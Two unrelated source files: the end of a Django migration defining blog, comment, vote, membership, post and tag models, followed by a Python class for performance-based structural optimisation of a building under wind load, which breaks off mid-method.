('post_karma_threshold', models.SmallIntegerField(default=0, verbose_name='Post karma threshold')),
('comment_condition', models.CharField(choices=[('A', 'Anyone can comment'), ('K', 'Only users with high karma can comment')], default='A', max_length=2, verbose_name='Who can comment in the blog')),
('comment_membership_required', models.BooleanField(default=False, verbose_name='Require membership to write comments')),
('comment_karma_threshold', models.SmallIntegerField(default=0, verbose_name='Comment karma threshold')),
],
options={
'verbose_name_plural': 'Blogs',
'ordering': ('name',),
'verbose_name': 'Blog',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='content_renderer', verbose_name='Comment')),
('_content_html', s_markdown.models.HtmlCacheField(blank=True, editable=False, markdown_field=s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='content_renderer', verbose_name='Comment'), null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('rating', s_voting.models.VoteCacheField(default=0, query=s_voting.models._default_cache_query, vote_model=collective_blog.models.comment.CommentVote)),
('is_hidden', models.BooleanField(default=False, verbose_name='Is hidden')),
('is_hidden_by_moderator', models.BooleanField(default=False, verbose_name='Is hidden by moderator')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='collective_blog.Comment')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CommentVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vote', models.SmallIntegerField(choices=[(1, '+1'), (-1, '-1')])),
('object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes', to='collective_blog.Comment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes_for_collective_blog_commentvote', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Membership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('color', models.CharField(choices=[('gray', 'Gray'), ('black', 'Black'), ('blue', 'Blue'), ('orange', 'Orange'), ('purple', 'Purple'), ('marshy', 'Marshy'), ('turquoise', 'Turquoise'), ('red', 'Red'), ('yellow', 'Yellow'), ('green', 'Green')], default='gray', max_length=10)),
('role', models.CharField(choices=[('O', 'Owner'), ('M', 'Member'), ('B', 'Banned'), ('A', 'Administrator'), ('W', 'Waiting for approval'), ('L', 'Left the blog'), ('LB', 'Left the blog (banned)')], default='L', max_length=2)),
('ban_expiration', models.DateTimeField(default=django.utils.timezone.now)),
('can_change_settings_flag', models.BooleanField(default=False, verbose_name="Can change blog's settings")),
('can_delete_posts_flag', models.BooleanField(default=False, verbose_name='Can delete posts')),
('can_delete_comments_flag', models.BooleanField(default=False, verbose_name='Can delete comments')),
('can_ban_flag', models.BooleanField(default=False, verbose_name='Can ban a member')),
('can_accept_new_users_flag', models.BooleanField(default=False, verbose_name='Can accept new users')),
('can_manage_permissions_flag', models.BooleanField(default=False, verbose_name='Can manage permissions')),
('overall_posts_rating', s_voting.models.VoteCacheField(default=0, query=collective_blog.models.blog._overall_posts_rating_cache_query, vote_model=collective_blog.models.post.PostVote)),
('overall_comments_rating', s_voting.models.VoteCacheField(default=0, query=collective_blog.models.blog._overall_comments_rating_cache_query, vote_model=collective_blog.models.comment.CommentVote)),
('blog', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='collective_blog.Blog')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('heading', models.CharField(max_length=100, verbose_name='Title')),
('slug', models.SlugField(blank=True, editable=False, max_length=100, unique=True)),
('is_draft', models.BooleanField(default=True, verbose_name='Is draft')),
('content', s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), renderer_name='content_renderer', verbose_name='Content')),
('_content_html', s_markdown.models.HtmlCacheField(blank=True, editable=False, markdown_field=s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), renderer_name='content_renderer', verbose_name='Content'), null=True)),
('created', models.DateTimeField(blank=True, editable=False, null=True)),
('updated', models.DateTimeField(auto_now=True)),
('rating', s_voting.models.VoteCacheField(default=0, query=s_voting.models._default_cache_query, vote_model=collective_blog.models.post.PostVote)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='Author')),
('blog', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='collective_blog.Blog', verbose_name='Blog')),
],
options={
'verbose_name_plural': 'Posts',
'ordering': ('-created',),
'verbose_name': 'Post',
},
),
migrations.CreateModel(
name='PostVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vote', models.SmallIntegerField(choices=[(1, '+1'), (-1, '-1')])),
('object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes', to='collective_blog.Post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes_for_collective_blog_postvote', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True, verbose_name='Name')),
('slug', models.SlugField(max_length=100, unique=True, verbose_name='Slug')),
],
options={
'verbose_name_plural': 'Tags',
'ordering': ('name',),
'verbose_name': 'Tag',
},
),
migrations.CreateModel(
name='TaggedItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.IntegerField(db_index=True, verbose_name='Object id')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='collective_blog_taggeditem_tagged_items', to='contenttypes.ContentType', verbose_name='Content type')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='collective_blog_taggeditem_items', to='collective_blog.Tag')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='post',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags', through='collective_blog.TaggedItem', to='collective_blog.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='comment',
name='post',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='collective_blog.Post', verbose_name='Post'),
),
migrations.AddField(
model_name='blog',
name='members',
field=models.ManyToManyField(editable=False, through='collective_blog.Membership', to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='postvote',
unique_together=set([('user', 'object')]),
),
migrations.AlterUniqueTogether(
name='membership',
unique_together=set([('user', 'blog')]),
),
migrations.AlterUniqueTogether(
name='commentvote',
unique_together=set([('user', 'object')]),
),
]
|
import numpy as np
from scipy.integrate import simps
from StochasticMechanics import Stochastic
from Building import *
from BuildingProperties import *
from Hazards import Stationary
import copy
import time
import matplotlib.pyplot as plt
from scipy import integrate
import time
class PerformanceOpt(Stochastic):
    # Performance based engineering: optimization. This is a subclass of Stochastic.
    # NOTE(review): this class reads several module-level globals (building, columns,
    # slabs, core, concrete, steel, cost, wind, z, dry_wall_area, ndof) that are
    # presumably supplied by the star imports of Building / BuildingProperties —
    # confirm against those modules.
    def __init__(self, power_spectrum=None, model=None, freq=None, tol=1e-5, maxiter=100, design_life=1):
        """Store optimization settings and building data, then initialize Stochastic.

        power_spectrum: excitation power spectrum forwarded to Stochastic.
        model: structural model identifier forwarded to Stochastic.
        freq: frequency discretization used by the spectral analysis.
        tol, maxiter: convergence controls for the statistical linearization.
        design_life: multiplier converting the loss rate into a total loss
            (same time units as the rate — see annual_financial_loss).
        """
        self.power_spectrum = power_spectrum
        self.model = model
        self.freq = freq
        self.tol = tol
        self.maxiter = maxiter
        self.design_life = design_life
        # Building data comes from module-level globals (BuildingProperties).
        self.building = building
        self.columns = columns
        self.slabs = slabs
        self.core = core
        self.concrete = concrete
        self.steel = steel
        self.cost = cost
        self.ndof = building["ndof"]
        Stochastic.__init__(self, power_spectrum=power_spectrum, model=model, ndof=self.ndof, freq=freq)
    def objective_function(self, size_col=None, args=None):
        """Total expected cost (initial cost + expected loss) for the given column sizes.

        size_col: sequence of column side lengths, one per DOF (square sections).
        args: sequence [ksi, im_max, B_max, gamma, nu, alpha, a] — damping ratio,
            maximum intensity measure, maximum barrier level, and Bouc-Wen
            model parameters.
        Returns the scalar total cost (printed as a side effect).
        """
        # im_max: maximum intensity measure
        # B_max: maximum barrier level
        # ndof = 2
        # im_max = 30
        # B_max = 1
        # ksi = np.ones((ndof)) * [0.05]
        # gamma = np.ones((ndof)) * [0.5]
        # nu = np.ones((ndof)) * [0.5]
        # alpha = np.ones((ndof)) * [1]
        # a = np.ones((ndof)) * [1.0]  # 0.01
        # Objective function: returns the rate of annual loss due to excessive drift.
        # Parameters of the Bouc-Wen model.
        ksi = args[0]
        im_max = args[1]
        B_max = args[2]
        gamma = args[3]
        nu = args[4]
        alpha = args[5]
        a = args[6]
        # Get some properties of the building.
        ndof = self.ndof
        self.columns = update_columns(columns=self.columns, lx=size_col, ly=size_col)
        Building = Structure(building, columns, slabs, core, concrete, steel, cost)
        if len(size_col) != ndof:
            raise ValueError('length of size_col is not equal to ndof!')
        initial_cost = 0
        k = []
        # Loop over each DOF.
        for i in range(ndof):
            # Get properties of the columns.
            self.columns = update_columns(columns=self.columns, lx=size_col[i], ly=size_col[i])
            Ix = size_col[i] ** 4 / 12
            Iy = Ix  # Square section
            area = size_col[i] ** 2  # square section
            # Get the stifness and cost.
            Building = Structure(building, columns, slabs, core, concrete, steel, cost)
            Cost = Costs(building, columns, slabs, core, concrete, steel, cost)
            stiffness = Building.stiffness_story()
            k.append(stiffness)
            initial_cost = initial_cost + Cost.initial_cost_stiffness(col_size=size_col[i], par0=25.55133, par1=0.33127)
        # k[end] top floor
        k = np.array(k)  # Stifness vector.
        mass = Building.mass_storey(top_story=False)  # mass per story.
        mass_top = Building.mass_storey(top_story=True)  # mass in the top story.
        m = np.ones((ndof)) * [mass]  # Mass vector.
        m[-1] = mass_top  # Top floor is m[end] - include water reservoir
        # Estimate the damping.
        c = PerformanceOpt.linear_damping(self, m=m, k=k, ksi=ksi)
        # Determine the matrices M, C, and K.
        M, C, K = PerformanceOpt.create_mck(self, m=m, c=c, k=k, gamma=gamma, nu=nu, alpha=alpha, a=a)
        # Estimate the rate of financial loss.
        financial_loss_rate = PerformanceOpt.annual_financial_loss(self, M=M, C=C, K=K, stiff=k, im_max=im_max,
                                                                   B_max=B_max, size_col=size_col, gamma=gamma, nu=nu,
                                                                   alpha=alpha, a=a)
        # Estimate the total loss considering the design life of the building (e.g., 50 years converted into seconds).
        total_loss = financial_loss_rate * self.design_life
        # total_cost = total loss.
        total_cost = initial_cost + total_loss
        print(size_col)
        print(total_cost)
        # return total_cost, initial_cost, total_loss
        return total_cost
    def annual_financial_loss(self, M=None, C=None, K=None, stiff=None, im_max=None, B_max=None, size_col=None,
                              **kwargs):
        """Expected financial loss rate via the PBDO double integral over IM and B.

        M, C, K: system matrices; stiff: per-story stiffness vector;
        im_max: upper integration limit for the intensity measure;
        B_max: nominal maximum barrier (the actual B range per DOF is the
            95% band around the linearized mean response);
        size_col: column sizes per DOF (used by the damage-cost model).
        Required kwarg: `a` (Bouc-Wen parameter vector, all entries >= 0).
        Returns the loss rate scaled by 60*60*24*30*12 (per-second rate into
        a yearly figure using 30-day months).
        """
        # Estimate the annual financial loss.
        im = im_max  # Intensity measure.
        B = B_max  # Barrier B: interstory drift ratio.
        # Determine the cost of failure.
        CostFailure = Costs(building=building, columns=columns, slabs=slabs, core=core, concrete=concrete,
                            steel=steel, cost=cost)
        # Properties of the excitation PSD.
        kv = wind["kv"]
        Av = wind["Av"]
        if 'a' in kwargs.keys():
            a = kwargs['a']
            # NOTE(review): bare `ndof` here (not self.ndof) — presumably the
            # module-level global from BuildingProperties; confirm self.ndof
            # was not intended.
            for i in range(ndof):
                if a[i] < 0:
                    raise ValueError('a cannot be less than 0.')
        else:
            raise ValueError('a cannot be None.')
        start_time = time.time()
        # Quadrature resolution for the IM and barrier grids.
        Nim = 100
        NB = 100
        imvec = np.linspace(0.00001, im_max, Nim)
        dIM = imvec[1] - imvec[0]
        # Compute the duble integral pf the PBDO framework: check paper (Beck, dos Santos, and Kougioumtzoglou, 2014)
        integ = np.zeros(self.ndof)
        integral_IM = np.zeros((Nim, self.ndof))
        # Loop over the intensity measure (IM).
        for i in range(Nim):
            # Intensity measure.
            im = imvec[i]
            # Power spectrum.
            Ps = Stationary(power_spectrum_object='windpsd', ndof=self.ndof)
            power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=self.freq, z=z)
            # Sto = Stochastic(power_spectrum=power_spectrum, model=self.model, ndof=ndof, freq=self.freq)
            # start_time = time.time()
            # Statistical linearization. Var = Variance of displacement, Vard = Variance of velocity.
            Var, Vard = PerformanceOpt.statistical_linearization(self, M=M, C=C, K=K, power_sp=power_spectrum,
                                                                 tol=self.tol, maxiter=self.maxiter, **kwargs)
            # end_time = time.time()
            # timef = end_time - start_time
            # print('Time: ' + str(timef))
            Var = Var.T
            Vard = Vard.T
            Var = Var[0]
            Vard = Vard[0]
            # Estimate the wind force: aeroelasticity.
            rho = wind["rho"]
            Cd = wind["Cd"]
            L = columns["height"]
            ncolumns = columns["quantity"]
            building_area = building["height"] * building["width"]
            wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
            meanY = Stochastic.linear_mean_response(stiff, wind_force, a)
            # Loop over the Barrier B.
            integral_B = []
            for j in range(self.ndof):
                # Integrate B over the 95% band around the mean response.
                B_min = max(0, meanY[j] - 1.96 * np.sqrt(Var[j]))
                B_max = max(0, meanY[j] + 1.96 * np.sqrt(Var[j]))
                if B_min <= 0:
                    B_min = 0.0001
                Bvec = np.linspace(B_min, B_max, NB)
                dB = Bvec[1] - Bvec[0]
                up_rate = []
                for l in range(NB):
                    B = Bvec[l]
                    # Estimate the up-crossing rate.
                    up_crossing_rate = ((np.sqrt(Vard[j] / Var[j])) / (2 * np.pi)) * \
                                       np.exp(-((B - meanY[j]) ** 2) / (2 * Var[j]))
                    # Central finite difference of the damage-cost curve.
                    h = 0.00001
                    Cf0 = CostFailure.cost_damage(b=B - h, col_size=size_col[j], L=L, ncolumns=ncolumns,
                                                  dry_wall_area=dry_wall_area)
                    Cf1 = CostFailure.cost_damage(b=B + h, col_size=size_col[j], L=L, ncolumns=ncolumns,
                                                  dry_wall_area=dry_wall_area)
                    Cf = abs((Cf1 - Cf0) / (2 * h))
                    # Cf = CostFailure.cost_damage(b=B, col_size=size_col[j], L=L, ncolumns=ncolumns,
                    #                              dry_wall_area=dry_wall_area)
                    rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av)  # gumbel, weibull
                    up_rate.append(rate)  # TImes 2?
                # integral_B.append(simps(np.array(up_rate), Bvec)*dIM)
                # integ[j] = integ[j] + simps(np.array(up_rate), Bvec)*dIM
                integral_IM[i, j] = simps(np.array(up_rate), Bvec)
        # Outer integral over IM (Simpson's rule), summed over the DOFs.
        soma = 0
        for j in range(self.ndof):
            soma = soma + simps(integral_IM[:, j], imvec)
        # financial_loss_rate = PerformanceOpt.func_integral(B=B_max, im=im_max, M=M, C=C, K=K, stiff=stiff,
        #                                                    z=z, freq=self.freq, model=self.model, ndof=self.ndof,
        #                                                    tol=self.tol, maxiter=self.maxiter, kwargs=kwargs)
        # v = integrate.dblquad(PerformanceOpt.func_integral, 0, im_max, lambda B: 0, lambda B: B_max,
        #                       args=[M, C, K, stiff, z, self.freq, self.model, self.ndof, self.tol, self.maxiter, kwargs])
        # Scale the per-second rate to a yearly figure (12 months of 30 days).
        financial_loss_rate = 60 * 60 * 24 * 30 * 12 * soma
        # print(power_spectrum[10,:])
        # print(Var)
        end_time = time.time()
        timef = end_time - start_time
        print('Time: ' + str(timef))
        return financial_loss_rate
    @staticmethod
    def func_integral(B=None, im=None, M=None, C=None, K=None, stiff=None, z=None, freq=None, model=None,
                      ndof=None, tol=None, maxiter=None, kwargs=None):
        """Pointwise integrand of the PBDO double integral.

        Alternative formulation kept for use with scipy.integrate.dblquad
        (see the commented-out call in annual_financial_loss). Uses a
        placeholder failure cost Cf = 1000.
        """
        Ps = Stationary(power_spectrum_object='windpsd', ndof=ndof)
        power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=freq, z=z)
        Sto = Stochastic(power_spectrum=power_spectrum, model=model, ndof=ndof, freq=freq)
        Var, Vard = Sto.statistical_linearization(M=M, C=C, K=K, tol=tol, maxiter=maxiter, **kwargs)
        Var = Var.T
        Vard = Vard.T
        Var = Var[0]
        Vard = Vard[0]
        rho = wind["rho"]
        Cd = wind["Cd"]
        building_area = building["height"] * building["width"]
        wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
        meanY = Stochastic.linear_mean_response(stiff, wind_force)
        up_crossing_rate = ((np.sqrt(Vard / Var)) / (2 * np.pi)) * np.exp(-((B - meanY) ** 2) / (2 * Var))
        kv = wind["kv"]
        Av = wind["Av"]
        Cf = 1000  # example only
        # rate = Cf * up_crossing_rate * Stationary.gumbel(im=im, kv=kv, Av=Av)  # Annual rate
        rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av)  # Annual rate
        return rate[0]
    #================================================== UNDER CONSTRUCTION ==============================================================
    # The methods presented next are used in the stochastic gradient descent framework.
    # def initial_cost(self, m=None, c=None, k=None, num_cols_floor=None, cost_cols):
    #
    #     ndof = self.ndof
    #
    #     for i in range(ndof)
    def objective_function_sto(self, size_col=None, args=None):
        """Monte Carlo variant of objective_function (for stochastic gradient descent).

        args: sequence [ksi, im_max, B_max, gamma, nu, alpha, a, nsim] — same
        as objective_function plus the number of Monte Carlo samples.
        """
        # im_max: maximum intensity measure
        # B_max: maximum barrier level
        # ndof = 2
        # im_max = 30
        # B_max = 1
        # ksi = np.ones((ndof)) * [0.05]
        # gamma = np.ones((ndof)) * [0.5]
        # nu = np.ones((ndof)) * [0.5]
        # alpha = np.ones((ndof)) * [1]
        # a = np.ones((ndof)) * [1.0]  # 0.01
        # Method under development: objective function used in the stochastic gradient descent.
        ksi = args[0]
        im_max = args[1]
        B_max = args[2]
        gamma = args[3]
        nu = args[4]
        alpha = args[5]
        a = args[6]
        nsim = args[7]
        ndof = self.ndof
        self.columns = update_columns(columns=self.columns, lx=size_col, ly=size_col)
        Building = Structure(building, columns, slabs, core, concrete, steel, cost)
        if len(size_col) != ndof:
            raise ValueError('length of size_col is not equal to ndof!')
        initial_cost = 0
        k = []
        for i in range(ndof):
            self.columns = update_columns(columns=self.columns, lx=size_col[i], ly=size_col[i])
            Ix = size_col[i] ** 4 / 12
            Iy = Ix  # Square section
            area = size_col[i] ** 2  # square section
            Building = Structure(building, columns, slabs, core, concrete, steel, cost)
            Cost = Costs(building, columns, slabs, core, concrete, steel, cost)
            stiffness = Building.stiffness_story()
            k.append(stiffness)
            initial_cost = initial_cost + Cost.initial_cost_stiffness(col_size=size_col[i], par0=25.55133, par1=0.33127)
        # k[end] top floor
        k = np.array(k)
        mass = Building.mass_storey(top_story=False)
        mass_top = Building.mass_storey(top_story=True)
        m = np.ones((ndof)) * [mass]
        # m[-1] = mass_top  # Top floor is m[end] - include water reservoir
        # Estimate the damping.
        c = PerformanceOpt.linear_damping(self, m=m, k=k, ksi=ksi)
        M, C, K = PerformanceOpt.create_mck(self, m=m, c=c, k=k, gamma=gamma, nu=nu, alpha=alpha, a=a)
        financial_loss_rate = PerformanceOpt.annual_financial_loss_sto(self, M=M, C=C, K=K, stiff=k, im_max=im_max,
                                                                       B_max=B_max, size_col=size_col, gamma=gamma, nu=nu,
                                                                       alpha=alpha, a=a, nsim=nsim)
        total_loss = financial_loss_rate * self.design_life
        total_cost = initial_cost + total_loss
        # return total_cost, initial_cost, total_loss
        return total_cost
    def annual_financial_loss_sto(self, M=None, C=None, K=None, stiff=None, im_max=None, B_max=None, size_col=None,
                                  **kwargs):
        """Monte Carlo estimate of the financial loss rate (SGD path; under development).

        Required kwargs: `a` (Bouc-Wen parameter vector, entries >= 0) and
        `nsim` (positive int, number of Monte Carlo samples of the IM).
        """
        # Under development: usend in the estimation of the annual financial loss in the stochastic gradient descent framework.
        # im = im_max
        # B = B_max
        # print([im,B])
        CostFailure = Costs(building=building, columns=columns, slabs=slabs, core=core, concrete=concrete,
                            steel=steel, cost=cost)
        kv = wind["kv"]
        Av = wind["Av"]
        if 'a' in kwargs.keys():
            a = kwargs['a']
            # NOTE(review): bare `ndof` (not self.ndof) — presumably the
            # module-level global from BuildingProperties; confirm.
            for i in range(ndof):
                if a[i] < 0:
                    raise ValueError('a cannot be less than 0.')
        else:
            raise ValueError('a cannot be None.')
        # nsim = 500
        if 'nsim' in kwargs.keys():
            nsim = kwargs['nsim']
            if nsim < 1:
                raise ValueError('nsim cannot be less than 1.')
            if not isinstance(nsim,int):
                raise TypeError('nsim must be integer.')
        else:
            raise ValueError('nsim cannot be None.')
        soma = np.zeros(ndof)
        # Monte Carlo loop: sample the intensity measure uniformly in [0, im_max).
        for i in range(nsim):
            im = im_max*np.random.rand()
            # B = B_max*np.random.rand()
            # Compute
            Ps = Stationary(power_spectrum_object='windpsd', ndof=self.ndof)
            power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=self.freq, z=z)
            # start_time = time.time()
            Var, Vard = PerformanceOpt.statistical_linearization(self, M=M, C=C, K=K, power_sp=power_spectrum,
                                                                 tol=self.tol, maxiter=self.maxiter, **kwargs)
            # end_time = time.time()
            # timef = end_time - start_time
            # print('Time: ' + str(timef))
            Var = Var.T
            Vard = Vard.T
            Var = Var[0]
            Vard = Vard[0]
            rho = wind["rho"]
            Cd = wind["Cd"]
            L = columns["height"]
            ncolumns = columns["quantity"]
            building_area = building["height"] * building["width"]
            wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
            meanY = Stochastic.linear_mean_response(stiff, wind_force, a)
            financial_loss_rate = 0
            lr_ndof = []
            for j in range(self.ndof):
                B_min = max(0, meanY[j] - 1.96 * np.sqrt(Var[j]))
                B_max = max(0, meanY[j] + 1.96 * np.sqrt(Var[j]))
                if B_min <= 0:
                    B_min = 0.0001
                # Sample the barrier level uniformly within the 95% band.
                B = (B_max-B_min)*np.random.rand()+B_min
                up_crossing_rate = ((np.sqrt(Vard[j] / Var[j])) / (2 * np.pi)) * \
                                   np.exp(-((B - meanY[j]) ** 2) / (2 * Var[j]))
                # Central finite difference of the damage-cost curve.
                h = 0.00001
                Cf0 = CostFailure.cost_damage(b=B - h, col_size=size_col[j], L=L, ncolumns=ncolumns,
                                              dry_wall_area=dry_wall_area)
                Cf1 = CostFailure.cost_damage(b=B + h, col_size=size_col[j], L=L, ncolumns=ncolumns,
                                              dry_wall_area=dry_wall_area)
                Cf = abs((Cf1 - Cf0) / (2 * h))
                # Cf = CostFailure.cost_damage(b=B, col_size=size_col[j], L=L, ncolumns=ncolumns,
                #                              dry_wall_area=dry_wall_area)
                loss_rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av)  # gumbel, weibull
                # Monte Carlo accumulation of the double integral.
                soma[j] = soma[j] + loss_rate*(B_max-B_min)*im_max/nsim
        # avg_loss = (soma/nsim)*B_max*im_max
        # Scale the per-second rate to a yearly figure (12 months of 30 days).
        financial_loss_rate = 60 * 60 * 24 * 30 * 12 * (np.sum(soma))
        # print(soma)
        return financial_loss_rate
    def annual_financial_loss_sto_(self, M=None, C=None, K=None, stiff=None, im_max=None, B_max=None, size_col=None,
                                   **kwargs):
        """Single-point variant of annual_financial_loss_sto: evaluates the loss
        rate at the fixed point (im_max, B_max) only. Under development."""
        im = im_max
        B = B_max
        print([im,B])
        CostFailure = Costs(building=building, columns=columns, slabs=slabs, core=core, concrete=concrete,
                            steel=steel, cost=cost)
        kv = wind["kv"]
        Av = wind["Av"]
        if 'a' in kwargs.keys():
            a = kwargs['a']
            # NOTE(review): bare `ndof` — see annual_financial_loss.
            for i in range(ndof):
                if a[i] < 0:
                    raise ValueError('a cannot be less than 0.')
        else:
            raise ValueError('a cannot be None.')
        # Compute
        Ps = Stationary(power_spectrum_object='windpsd', ndof=self.ndof)
        power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=self.freq, z=z)
        start_time = time.time()
        Var, Vard = PerformanceOpt.statistical_linearization(self, M=M, C=C, K=K, power_sp=power_spectrum,
                                                             tol=self.tol, maxiter=self.maxiter, **kwargs)
        end_time = time.time()
